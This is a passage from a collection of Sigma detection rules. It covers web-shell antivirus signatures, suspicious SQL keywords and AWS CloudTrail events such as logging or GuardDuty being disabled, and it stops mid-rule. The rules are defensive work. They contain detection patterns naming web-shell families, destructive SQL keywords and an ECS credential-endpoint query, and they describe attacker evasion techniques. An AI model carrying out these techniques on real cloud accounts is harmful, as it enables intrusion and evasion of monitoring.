- 'weblogic'
selection_ext:
Filename|endswith:
- '.asax'
- '.ashx'
- '.asmx'
- '.asp'
- '.aspx'
- '.bat'
- '.cfm'
- '.cgi'
- '.chm'
- '.cmd'
- '.dat'
- '.ear'
- '.gif'
- '.hta'
- '.jpeg'
- '.jpg'
- '.jsp'
- '.jspx'
- '.lnk'
- '.msc'
- '.php'
- '.pl'
- '.png'
- '.ps1'
- '.psm1'
- '.py'
- '.pyc'
- '.rb'
- '.scf'
- '.sct'
- '.sh'
- '.svg'
- '.txt'
- '.vbe'
- '.vbs'
- '.war'
- '.wll'
- '.wsf'
- '.wsh'
- '.xll'
- '.xml'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/category/antivirus/av_webshell.yml
================================================
title: Antivirus Web Shell Detection
id: fdf135a2-9241-4f96-a114-bb404948f736
status: test
description: |
Detects a highly relevant Antivirus alert that reports a web shell.
It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
references:
- https://www.nextron-systems.com/?s=antivirus
- https://github.com/tennc/webshell
- https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection
- https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection
- https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection
- https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection
- https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection
- https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection
- https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection
- https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection
author: Florian Roth (Nextron Systems), Arnim Rupp
date: 2018-09-09
modified: 2024-11-02
tags:
- attack.persistence
- attack.t1505.003
logsource:
category: antivirus
detection:
selection:
- Signature|startswith:
- 'ASP.'
- 'IIS/BackDoor'
- 'JAVA/Backdoor'
- 'JSP.'
- 'Perl.'
- 'PHP.'
- 'Troj/ASP'
- 'Troj/JSP'
- 'Troj/PHP'
- 'VBS/Uxor' # looking for 'VBS/' would also find downloader's and droppers meant for desktops
- Signature|contains:
- 'ASP_' # looking for 'VBS_' would also find downloader's and droppers meant for desktops
- 'ASP:'
- 'ASP.Agent'
- 'ASP/'
# - 'ASP/Agent'
- 'Aspdoor'
- 'ASPXSpy'
- 'Backdoor.ASP'
- 'Backdoor.Java'
- 'Backdoor.JSP'
- 'Backdoor.PHP'
- 'Backdoor.VBS'
- 'Backdoor/ASP'
- 'Backdoor/Java'
- 'Backdoor/JSP'
- 'Backdoor/PHP'
- 'Backdoor/VBS'
- 'C99shell'
- 'Chopper'
- 'filebrowser'
- 'JSP_'
- 'JSP:'
- 'JSP.Agent'
- 'JSP/'
# - 'JSP/Agent'
- 'Perl:'
- 'Perl/'
- 'PHP_'
- 'PHP:'
- 'PHP.Agent'
- 'PHP/'
# - 'PHP/Agent'
- 'PHPShell'
- 'PShlSpy'
- 'SinoChoper'
- 'Trojan.ASP'
- 'Trojan.JSP'
- 'Trojan.PHP'
- 'Trojan.VBS'
- 'VBS.Agent'
- 'VBS/Agent'
- 'Webshell'
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/category/database/db_anomalous_query.yml
================================================
title: Suspicious SQL Query
id: d84c0ded-edd7-4123-80ed-348bb3ccc4d5
status: test
description: Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields
author: '@juju4'
date: 2022-12-27
references:
- https://github.com/sqlmapproject/sqlmap
tags:
- attack.exfiltration
- attack.initial-access
- attack.privilege-escalation
- attack.persistence
- attack.t1190
- attack.t1505.001
logsource:
category: database
definition: 'Requirements: Must be able to log the SQL queries'
detection:
keywords:
- 'drop'
- 'truncate'
- 'dump'
- 'select \*'
condition: keywords
falsepositives:
- Inventory and monitoring activity
- Vulnerability scanners
- Legitimate applications
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_bucket_deleted.yml
================================================
title: AWS Bucket Deleted
id: 39c9f26d-6e3b-4dbb-9c7a-4154b0281112
status: experimental
description: |
Detects the deletion of S3 buckets in AWS CloudTrail logs.
Monitoring the deletion of S3 buckets is critical for security and data integrity, as it may indicate potential data loss or unauthorized access attempts.
references:
- https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucket.html
- https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/delete-bucket.html
author: Ivan Saakov, Nasreddine Bencherchali
date: 2025-10-19
tags:
- attack.defense-evasion
logsource:
product: aws
service: cloudtrail
detection:
selection_event_name:
eventName: 'DeleteBucket'
selection_status_success:
errorCode: 'Success'
selection_status_null:
errorCode: null
condition: selection_event_name and 1 of selection_status_*
falsepositives:
- During maintenance operations or testing, authorized administrators may delete S3 buckets as part of routine data management or cleanup activities.
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_console_login_failed_authentication.yml
================================================
title: AWS ConsoleLogin Failed Authentication
id: 6393e346-1977-46ef-8987-ad414a145fad
status: experimental
description: |
Detects failed AWS console login attempts due to authentication failures. Monitoring these events is crucial for identifying potential brute-force attacks or unauthorized access attempts to AWS accounts.
references:
- https://naikordian.github.io/blog/posts/brute-force-aws-console/
- https://help.fortinet.com/fsiem/Public_Resource_Access/7_2_1/rules/PH_RULE_AWS_Management_Console_Brute_Force_of_Root_User_Identity.htm
- https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1110.001/aws_login_failure/aws_cloudtrail_events.json
author: Ivan Saakov, Nasreddine Bencherchali
date: 2025-10-19
tags:
- attack.credential-access
- attack.t1110
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventName: 'ConsoleLogin'
errorMessage: 'Failed authentication'
condition: selection
falsepositives:
- Legitimate failed login attempts by authorized users. Investigate the source of repeated failed login attempts.
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_console_login_success_without_mfa.yml
================================================
title: AWS Successful Console Login Without MFA
id: 77caf516-34e5-4df9-b4db-20744fea0a60
status: experimental
description: |
Detects successful AWS console logins that were performed without Multi-Factor Authentication (MFA).
This alert can be used to identify potential unauthorized access attempts, as logging in without MFA can indicate compromised credentials or misconfigured security settings.
references:
- https://securitylabs.datadoghq.com/cloud-security-atlas/vulnerabilities/iam-user-without-mfa/
- https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html
author: Thuya@Hacktilizer, Ivan Saakov
date: 2025-10-18
modified: 2025-10-21
tags:
- attack.initial-access
- attack.defense-evasion
- attack.persistence
- attack.privilege-escalation
- attack.t1078.004
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventName: 'ConsoleLogin'
additionalEventData.MFAUsed: 'NO'
responseElements.ConsoleLogin: 'Success'
condition: selection
falsepositives:
- Unlikely
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_disable_logging.yml
================================================
title: AWS CloudTrail Important Change
id: 4db60cc0-36fb-42b7-9b58-a5b53019fb74
status: test
description: Detects disabling, deleting and updating of a Trail
references:
- https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html
author: vitaliy0x1
date: 2020-01-21
modified: 2022-10-09
tags:
- attack.defense-evasion
- attack.t1562.008
logsource:
product: aws
service: cloudtrail
detection:
selection_source:
eventSource: cloudtrail.amazonaws.com
eventName:
- StopLogging
- UpdateTrail
- DeleteTrail
condition: selection_source
falsepositives:
- Valid change in a Trail
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_guardduty_detector_deleted_or_updated.yml
================================================
title: AWS GuardDuty Detector Deleted Or Updated
id: d2656e78-c069-4571-8220-9e0ab5913f19
status: experimental
description: |
Detects successful deletion or disabling of an AWS GuardDuty detector, possibly by an attacker trying to avoid detection of its malicious activities.
Upon deletion, GuardDuty stops monitoring the environment and all existing findings are lost.
Verify with the user identity that this activity is legitimate.
references:
- https://docs.aws.amazon.com/guardduty/latest/APIReference/API_DeleteDetector.html
- https://docs.aws.amazon.com/guardduty/latest/APIReference/API_UpdateDetector.html
- https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_suspend-disable.html
- https://docs.datadoghq.com/security/default_rules/719-39f-9cd/
- https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-guardduty-detector-is-enabled
- https://docs.stellarcyber.ai/5.2.x/Using/ML/Alert-Rule-Based-Potentially_Malicious_AWS_Activity.html
- https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Amazon%20Web%20Services/Analytic%20Rules/AWS_GuardDutyDisabled.yaml
- https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/defense_evasion_guardduty_detector_deletion.toml
- https://help.fortinet.com/fsiem/Public_Resource_Access/7_4_0/rules/PH_RULE_AWS_GuardDuty_Detector_Deletion.htm
- https://research.splunk.com/sources/5d8bd475-c8bc-4447-b27f-efa508728b90/
- https://suktech24.com/2025/07/17/aws-threat-detection-rule-guardduty-detector-disabled-or-suspended/
- https://www.atomicredteam.io/atomic-red-team/atomics/T156001#atomic-test-46---aws---guardduty-suspension-or-deletion
author: suktech24
date: 2025-11-27
tags:
- attack.defense-evasion
- attack.t1562.001
- attack.t1562.008
logsource:
product: aws
service: cloudtrail
detection:
selection_event_source:
eventSource: 'guardduty.amazonaws.com'
selection_action_delete:
eventName: 'DeleteDetector'
selection_action_update:
eventName: 'UpdateDetector'
requestParameters.enable: 'false'
selection_status_success:
errorCode: 'Success'
selection_status_null:
errorCode: null
condition: selection_event_source and 1 of selection_action_* and 1 of selection_status_*
falsepositives:
- Legitimate detector deletion by an admin (e.g., during account decommissioning).
- Temporary disablement for troubleshooting (verify via change management tickets).
- Automated deployment tools (e.g. Terraform) managing GuardDuty state.
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_imds_malicious_usage.yml
================================================
title: Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure
id: 352a918a-34d8-4882-8470-44830c507aa3
status: test
description: |
Detects when an instance identity has taken an action that isn't inside SSM.
This can indicate that a compromised EC2 instance is being used as a pivot point.
references:
- https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-identity-roles.html
- https://ermetic.com/blog/aws/aws-ec2-imds-what-you-need-to-know/
- https://www.packetmischief.ca/2023/07/31/amazon-ec2-credential-exfiltration-how-it-happens-and-how-to-mitigate-it/#lifting-credentials-from-imds-this-is-why-we-cant-have-nice-things
author: jamesc-grafana
date: 2024-07-11
tags:
- attack.privilege-escalation
- attack.defense-evasion
- attack.initial-access
- attack.persistence
- attack.t1078
- attack.t1078.002
logsource:
product: aws
service: cloudtrail
detection:
selection:
userIdentity.arn|re: '.+:assumed-role/aws:.+'
filter_main_generic:
- eventSource: 'ssm.amazonaws.com'
- eventName: 'RegisterManagedInstance'
- sourceIPAddress: 'AWS Internal'
condition: selection and not 1 of filter_main_*
falsepositives:
- A team has configured an EC2 instance to use instance profiles that grant the option for the EC2 instance to talk to other AWS Services
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_new_acl_entries.yml
================================================
title: New Network ACL Entry Added
id: e1f7febb-7b94-4234-b5c6-00fb8500f5dd
status: test
description: |
Detects that network ACL entries have been added to a route table which could indicate that new attack vectors have been opened up in the AWS account.
references:
- https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/
author: jamesc-grafana
date: 2024-07-11
tags:
- attack.defense-evasion
- attack.t1562.007
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'ec2.amazonaws.com'
eventName: 'CreateNetworkAclEntry'
condition: selection
falsepositives:
- Legitimate use of ACLs to enable customer and staff access from the public internet into a public VPC
level: low
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_new_route_added.yml
================================================
title: New Network Route Added
id: c803b2ce-c4a2-4836-beae-b112010390b1
status: test
description: |
Detects the addition of a new network route to a route table in AWS.
references:
- https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/
author: jamesc-grafana
date: 2024-07-11
tags:
- attack.defense-evasion
- attack.t1562.007
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'ec2.amazonaws.com'
eventName: 'CreateRoute'
condition: selection
falsepositives:
- New VPC Creation requiring setup of a new route table
- New subnets added requiring routing setup
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_pua_trufflehog.yml
================================================
title: PUA - AWS TruffleHog Execution
id: a840e606-7c8c-4684-9bc1-eb6b6155127f
status: experimental
description: |
Detects the execution of TruffleHog, a popular open-source tool used for scanning repositories for secrets and sensitive information, within an AWS environment.
It has been reported to be used by threat actors for credential harvesting. All detections should be investigated to determine if the usage is authorized by security teams or potentially malicious.
references:
- https://github.com/trufflesecurity/trufflehog
- https://www.rapid7.com/blog/post/tr-crimson-collective-a-new-threat-group-observed-operating-in-the-cloud/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-10-21
tags:
- attack.credential-access
- attack.t1555
- attack.t1003
logsource:
product: aws
service: cloudtrail
detection:
selection:
userAgent: 'TruffleHog'
condition: selection
falsepositives:
- Legitimate use of TruffleHog by security teams for credential scanning.
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_region_enabled.yml
================================================
title: AWS EnableRegion Command Monitoring
id: a5ffb6ea-c784-4e01-b30a-deb6e58ca2ab
status: experimental
description: |
Detects the use of the EnableRegion command in AWS CloudTrail logs.
While AWS has 30+ regions, some of them are enabled by default, others must be explicitly enabled in each account separately.
There may be situations where security monitoring does not cover some new AWS regions.
Monitoring the EnableRegion command is important for identifying potential persistence mechanisms employed by adversaries, as enabling additional regions can facilitate continued access and operations within an AWS environment.
references:
- https://docs.aws.amazon.com/accounts/latest/reference/API_EnableRegion.html
- https://awscli.amazonaws.com/v2/documentation/api/2.14.0/reference/account/enable-region.html
author: Ivan Saakov, Sergey Zelenskiy
date: 2025-10-19
tags:
- attack.persistence
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventName: 'EnableRegion'
eventSource: 'account.amazonaws.com'
condition: selection
falsepositives:
- Legitimate use of the EnableRegion command by authorized administrators.
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_ingress_egress.yml
================================================
title: Ingress/Egress Security Group Modification
id: 6fb77778-040f-4015-9440-572aa9b6b580
status: test
description: |
Detects when an account makes changes to the ingress or egress rules of a security group.
This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server.
references:
- https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/
author: jamesc-grafana
date: 2024-07-11
tags:
- attack.initial-access
- attack.t1190
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'ec2.amazonaws.com'
eventName:
- 'AuthorizeSecurityGroupEgress'
- 'AuthorizeSecurityGroupIngress'
- 'RevokeSecurityGroupEgress'
- 'RevokeSecurityGroupIngress'
condition: selection
falsepositives:
- New VPCs and Subnets being setup requiring a different security profile to those already defined
- A single port being opened for a new service that is known to be deploying
- Administrators closing unused ports to reduce the attack surface
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_loadbalancer.yml
================================================
title: LoadBalancer Security Group Modification
id: 7a4409fc-f8ca-45f6-8006-127d779eaad9
status: test
description: |
Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB).
This can indicate that a misconfiguration allowing more traffic into the system than required, or could indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.
references:
- https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/
author: jamesc-grafana
date: 2024-07-11
tags:
- attack.initial-access
- attack.t1190
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'elasticloadbalancing.amazonaws.com'
eventName:
- 'ApplySecurityGroupsToLoadBalancer'
- 'SetSecurityGroups'
condition: selection
falsepositives:
- Repurposing of an ELB or ALB to serve a different or additional application
- Changes to security groups to allow for new services to be deployed
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_rds.yml
================================================
title: RDS Database Security Group Modification
id: 14f3f1c8-02d5-43a2-a191-91ffb52d3015
status: test
description: |
Detects changes to the security group entries for RDS databases.
This can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet, a wider audience within the VPC or that removal of valid rules has occurred which could impact the availability of the database to legitimate services and users.
references:
- https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/
author: jamesc-grafana
date: 2024-07-11
tags:
- attack.initial-access
- attack.t1190
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'rds.amazonaws.com'
eventName:
- 'AuthorizeDBSecurityGroupIngress'
- 'CreateDBSecurityGroup'
- 'DeleteDBSecurityGroup'
- 'RevokeDBSecurityGroupIngress'
condition: selection
falsepositives:
- Creation of a new Database that needs new security group rules
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_ssm_malicious_usage.yml
================================================
title: Potential Malicious Usage of CloudTrail System Manager
id: 38e7f511-3f74-41d4-836e-f57dfa18eead
status: test
description: |
Detect when System Manager successfully executes commands against an instance.
references:
- https://github.com/elastic/detection-rules/blob/v8.6.0/rules/integrations/aws/initial_access_via_system_manager.toml
author: jamesc-grafana
date: 2024-07-11
modified: 2025-12-08
tags:
- attack.privilege-escalation
- attack.initial-access
- attack.t1566
- attack.t1566.002
logsource:
product: aws
service: cloudtrail
detection:
selection_event:
eventName: 'SendCommand'
eventSource: 'ssm.amazonaws.com'
selection_status_success:
errorCode: 'Success'
selection_status_null:
errorCode: null
condition: selection_event and 1 of selection_status_*
falsepositives:
- There are legitimate uses of SSM to send commands to EC2 instances
- Legitimate users may have to use SSM to perform actions against machines in the Cloud to update or maintain them
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_vpc_flow_logs_deleted.yml
================================================
title: AWS VPC Flow Logs Deleted
id: e386b9b5-af12-450e-afff-761730fb8a98
status: experimental
description: |
Detects the deletion of one or more VPC Flow Logs in AWS Elastic Compute Cloud (EC2) through the DeleteFlowLogs API call.
Adversaries may delete flow logs to evade detection or remove evidence of network activity, hindering forensic investigations and visibility into malicious operations.
references:
- https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteFlowLogs.html
- https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-flow-logs.html
- https://www.elastic.co/docs/reference/security/prebuilt-rules/rules/integrations/aws/defense_evasion_ec2_flow_log_deletion
author: Ivan Saakov
date: 2025-10-19
tags:
- attack.defense-evasion
logsource:
product: aws
service: cloudtrail
detection:
selection_event_name:
eventName: 'DeleteFlowLogs'
selection_status_success:
errorCode: 'Success'
selection_status_null:
errorCode: null
condition: selection_event_name and 1 of selection_status_*
falsepositives:
- During maintenance operations or testing, authorized administrators may delete VPC Flow Logs as part of routine network management or cleanup activities.
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_config_disable_recording.yml
================================================
title: AWS Config Disabling Channel/Recorder
id: 07330162-dba1-4746-8121-a9647d49d297
status: test
description: Detects AWS Config Service disabling
references:
- https://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html
author: vitaliy0x1
date: 2020-01-21
modified: 2022-10-09
tags:
- attack.defense-evasion
- attack.t1562.008
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'config.amazonaws.com'
eventName:
- 'DeleteDeliveryChannel'
- 'StopConfigurationRecorder'
condition: selection
falsepositives:
- Valid change in AWS Config Service
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_console_getsignintoken.yml
================================================
title: AWS Console GetSigninToken Potential Abuse
id: f8103686-e3e8-46f3-be72-65f7fcb4aa53
status: test
description: |
Detects potentially suspicious events involving "GetSigninToken".
An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.
references:
- https://github.com/NetSPI/aws_consoler
- https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/
author: Chester Le Bron (@123Le_Bron)
date: 2024-02-26
tags:
- attack.lateral-movement
- attack.defense-evasion
- attack.t1021.007
- attack.t1550.001
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'signin.amazonaws.com'
eventName: 'GetSigninToken'
filter_main_console_ua:
userAgent|contains: 'Jersey/${project.version}'
condition: selection and not 1 of filter_main_*
falsepositives:
- GetSigninToken events will occur when using AWS SSO portal to login and will generate false positives if you do not filter for the expected user agent(s), see filter. Non-SSO configured roles would be abnormal and should be investigated.
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_delete_identity.yml
================================================
title: SES Identity Has Been Deleted
id: 20f754db-d025-4a8f-9d74-e0037e999a9a
status: test
description: Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities
references:
- https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
author: Janantha Marasinghe
date: 2022-12-13
modified: 2022-12-28
tags:
- attack.defense-evasion
- attack.t1070
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'ses.amazonaws.com'
eventName: 'DeleteIdentity'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_delete_saml_provider.yml
================================================
title: AWS SAML Provider Deletion Activity
id: ccd6a6c8-bb4e-4a91-9d2a-07e632819374
status: experimental
description: |
Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access.
An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it.
references:
- https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteSAMLProvider.html
author: Ivan Saakov
date: 2024-12-19
tags:
- attack.t1078.004
- attack.privilege-escalation
- attack.defense-evasion
- attack.initial-access
- attack.persistence
- attack.t1531
- attack.impact
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'iam.amazonaws.com'
eventName: 'DeleteSAMLProvider'
status: 'success'
condition: selection
falsepositives:
- Automated processes using tools like Terraform may trigger this alert.
- Legitimate administrative actions by authorized system administrators could cause this alert. Verify the user identity, user agent, and hostname to ensure they are expected.
- Deletions by unfamiliar users should be investigated. If the behavior is known and expected, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_disable_bucket_versioning.yml
================================================
title: AWS S3 Bucket Versioning Disable
id: a136ac98-b2bc-4189-a14d-f0d0388e57a7
status: test
description: Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.
references:
- https://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82
author: Sean Johnstone | Unit 42
date: 2023-10-28
tags:
- attack.impact
- attack.t1490
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: s3.amazonaws.com
eventName: PutBucketVersioning
requestParameters|contains: 'Suspended'
condition: selection
falsepositives:
- AWS administrator legitimately disabling bucket versioning
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_ec2_disable_encryption.yml
================================================
title: AWS EC2 Disable EBS Encryption
id: 16124c2d-e40b-4fcc-8f2c-5ab7870a2223
status: stable
description: |
Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.
Disabling default encryption does not change the encryption status of your existing volumes.
references:
- https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html
author: Sittikorn S
date: 2021-06-29
modified: 2021-08-20
tags:
- attack.impact
- attack.t1486
- attack.t1565
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: ec2.amazonaws.com
eventName: DisableEbsEncryptionByDefault
condition: selection
falsepositives:
- System Administrator Activities
- DEV, UAT, SAT environment. You should apply this rule with PROD account only.
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_ec2_import_key_pair_activity.yml
================================================
title: AWS Key Pair Import Activity
id: 92f84194-8d9a-4ee0-8699-c30bfac59780
status: experimental
description: |
Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.
references:
- https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ImportKeyPair.html
author: Ivan Saakov
date: 2024-12-19
tags:
- attack.initial-access
- attack.defense-evasion
- attack.t1078
- attack.persistence
- attack.privilege-escalation
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'ec2.amazonaws.com'
eventName: 'ImportKeyPair'
condition: selection
falsepositives:
- Legitimate administrative actions by authorized users importing keys for valid purposes.
- Automated processes for infrastructure setup may trigger this alert.
- Verify the user identity, user agent, and source IP address to ensure they are expected.
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_ec2_startup_script_change.yml
================================================
title: AWS EC2 Startup Shell Script Change
id: 1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df
status: test
description: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.
references:
- https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9
author: faloker
date: 2020-02-12
modified: 2022-06-07
tags:
- attack.execution
- attack.t1059.001
- attack.t1059.003
- attack.t1059.004
logsource:
product: aws
service: cloudtrail
detection:
selection_source:
eventSource: ec2.amazonaws.com
requestParameters.attribute: 'userData'
eventName: ModifyInstanceAttribute
condition: selection_source
falsepositives:
- Valid changes to the startup script
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_ec2_vm_export_failure.yml
================================================
title: AWS EC2 VM Export Failure
id: 54b9a76a-3c71-4673-b4b3-2edb4566ea7b
status: test
description: An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.
references:
- https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance
author: Diogo Braz
date: 2020-04-16
modified: 2022-10-05
tags:
- attack.collection
- attack.t1005
- attack.exfiltration
- attack.t1537
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventName: 'CreateInstanceExportTask'
eventSource: 'ec2.amazonaws.com'
filter1:
errorMessage|contains: '*'
filter2:
errorCode|contains: '*'
filter3:
responseElements|contains: 'Failure'
condition: selection and not 1 of filter*
level: low
================================================
FILE: rules/cloud/aws/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml
================================================
title: AWS ECS Task Definition That Queries The Credential Endpoint
id: b94bf91e-c2bf-4047-9c43-c6810f43baad
status: test
description: |
Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint.
This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.
references:
- https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py
- https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html
- https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html
author: Darin Smith
date: 2022-06-07
modified: 2023-04-24
tags:
- attack.persistence
- attack.t1525
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'ecs.amazonaws.com'
eventName:
- 'DescribeTaskDefinition'
- 'RegisterTaskDefinition'
- 'RunTask'
requestParameters.containerDefinitions.command|contains: '$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI'
condition: selection
falsepositives:
- Task Definition being modified to request credentials from the Task Metadata Service for valid reasons
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml
================================================
title: AWS EFS Fileshare Modified or Deleted
id: 25cb1ba1-8a19-4a23-a198-d252664c8cef
status: test
description: |
Detects when a EFS Fileshare is modified or deleted.
You can't delete a file system that is in use.
If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.
references:
- https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html
author: Austin Songer @austinsonger
date: 2021-08-15
modified: 2022-10-09
tags:
- attack.impact
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: elasticfilesystem.amazonaws.com
eventName: DeleteFileSystem
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml
================================================
title: AWS EFS Fileshare Mount Modified or Deleted
id: 6a7ba45c-63d8-473e-9736-2eaabff79964
status: test
description: Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.
references:
- https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html
author: Austin Songer @austinsonger
date: 2021-08-15
modified: 2022-10-09
tags:
- attack.impact
- attack.t1485
logsource:
product: aws
service: cloudtrail
detection:
selection:
